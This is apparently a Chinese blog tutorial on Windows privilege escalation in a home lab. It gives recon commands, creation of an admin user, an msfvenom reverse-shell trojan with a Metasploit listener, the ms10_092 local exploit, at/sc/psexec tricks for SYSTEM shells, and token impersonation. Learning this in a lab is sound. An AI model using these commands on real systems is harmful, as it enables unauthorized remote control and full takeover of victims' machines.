【网络安全】--win提权

提权目的

提高自己的执行权限,已完成更多高权限才拥有的特权

提权常用命令

whoami #查看当前用户权限

在这里插入图片描述

systeminfo # 查看操作系统及补丁情况

在这里插入图片描述

ipconfig #查看ip

在这里插入图片描述

net user #查看当前用户情况

在这里插入图片描述

netstat #查看当前网络连接情况(只有tcp)
netstat -ano #显示出tcp和udp连接情况

在这里插入图片描述

netstat -an | find “ESTABLISHED” #查看开启状态下的网络情况

在这里插入图片描述

tasklist #进程列表

在这里插入图片描述

taskkill -pid xxx #停止进程
net start #启动进程
net stop #停止进程
net user best 123456 /add #添加用户名为best 密码为123456的用户
net localgroup administrators best /add #将用户名为bast的用户添加到管理组
net user best /del #删除best用户

提权实战

常见的payload利用
KB2592799
KB3000061
KB2592799
1. 安装虚拟机win2008和kali

具体安装步骤详见https://blog.csdn.net/qq_41158271/article/details/127029119?spm=1001.2014.3001.5501

在这里插入图片描述

2. 创建普通用户

在这里插入图片描述
在这里插入图片描述

net user 用户名  密码 /add    #创建用户
net user #查看已有用户

在这里插入图片描述

3. 切换用户

在这里插入图片描述

4. kali生成木马并发送到被攻击服务器上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe>shell.exe
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.107
exploit

具体使用方法详见https://blog.csdn.net/qq_41158271/article/details/130362377?spm=1001.2014.3001.5502
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5. 被攻击方运行生成的木马文件

在这里插入图片描述
6. 查看监听是否连接成功并查看权限

在这里插入图片描述

7. 查看可利用漏洞

方法一:

run post/multi/recon/local_exploit_suggester   #查找可识别的漏洞

在这里插入图片描述
方法二:

run post/windows/gather/enum_patches  #查找未打补丁的漏洞

在这里插入图片描述

方法三:

使用wes或windowsVulnscan工具对比systeminfo信息查找未打补丁的漏洞(与方法二原理一致)

下载地址:https://github.com/bitsadmin/wesng
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8. 尝试利用exp提权

在这里插入图片描述
尝试使用此漏洞提权

backgroud  #切换到后台
show sessions #查看存在的会话
search ms10_092  #查找ms10_092漏洞可利用payload
use exploit/windows/local/ms10_092_schelevator #使用payload
show options #展示设置选项
set LHOST 192.168.0.107
run #运行

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
》》我这里未成功提升权限,具体步骤为上述步骤

at/sc/ps命令提权

at命令提权
at xx:xx /interactive cmd.exe  

当使用at命令设置定时计划后,执行时将会使用system权限运行,仅适用与win2007之前发布的系统
本次实验系统为win2003

在这里插入图片描述
在这里插入图片描述

sc命令提权
sc Create syscmd binPath = "cmd /k start" type= own type= interact #先创建服务
sc start syscmd #运行服务

适用于win7之前系统
在这里插入图片描述

ps命令提权

前提条件:需下载PsTools

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec.exe -accepteula -s -i -d cmd.exe
令牌窃取提权

限制条件:win2008或2003之前版本

use incognito
list_wokens -u
impersonate_token "NT AUTHORITY/SYSTEM" #""中为令牌号
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值